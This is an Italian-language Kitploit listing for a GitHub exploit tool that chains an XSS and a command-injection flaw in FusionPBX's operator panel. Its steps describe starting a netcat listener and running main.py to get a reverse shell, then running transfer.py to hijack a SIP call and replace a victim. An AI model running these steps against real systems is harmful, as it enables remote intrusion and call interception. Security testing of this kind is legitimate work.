Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
fusionpbx_rce_vulnerability — Concatenazione di CVE-2019-11408 – XSS nel pannello operatore e CVE-2019-11409 – Iniezione di comandi nel pannello operatore. | Kitploit
Strumenti/GitHubGitHub/hoseynheydari/fusionpbx_rce_vulnerability
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and ControlRed Teaming
GitHubhoseynheydari/fusionpbx_rce_vulnerability

fusionpbx_rce_vulnerability

Concatenazione di CVE-2019-11408 – XSS nel pannello operatore e CVE-2019-11409 – Iniezione di comandi nel pannello operatore.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
2 anni faNon ancora revisionato

Preludio

Questo semplice codice tenta di completare l'implementazione della vulnerabilità concatenata introdotta da Dustin Cobb in RCE utilizzando Caller ID – Multiple vulnerabilità in FusionPBX.

RCE

Passaggi di riproduzione

  1. Visualizza la schermata dell'operatore vulnerabile in un browser web, situata in questo esempio all'indirizzo https://{fusionpbx_address}/app/operator_panel/index.php
  2. Avvia un listener netcat su un sistema remoto (rce_listener_address).x`
  3. Esegui il codice dell'exploit di seguito sul sistema remoto in un'altra finestra del terminale python3 .\main.py --close_rce_sockets False --attacker_address {attacker_address} --fusion_pbx_address {fusion_pbx_address} --rce_listener_address {rce_listener_address}
  4. L'exploit si collegherà al listener netcat e fornirà una reverse shell

Sostituisci una chiamata

Conoscendo Call-ID, from-tag e to-tag di una chiamata, eseguire il codice sottostante ti sostituirà alla vittima nella chiamata.

Passaggi di riproduzione

  1. Innanzitutto, avvia una chiamata tra due SIP UA.
  2. Dopo che la chiamata è stata stabilita, dobbiamo costruire dialog_identifier concatenando {Call-ID}{semicolon}"to-teg:"{to-tag}"from-tag"{from-tag}.
  3. Esegui il codice hijacker di seguito sul sistema remoto e sostituisci te stesso con il numero della vittima. python3 .\transfer.py --attacker_address {attacker_address} --fusion_pbx_address {fusion_pbx_address} --victim_number {victim_number} --dialog_identifier {dialog_identifier}
Scarica lo strumento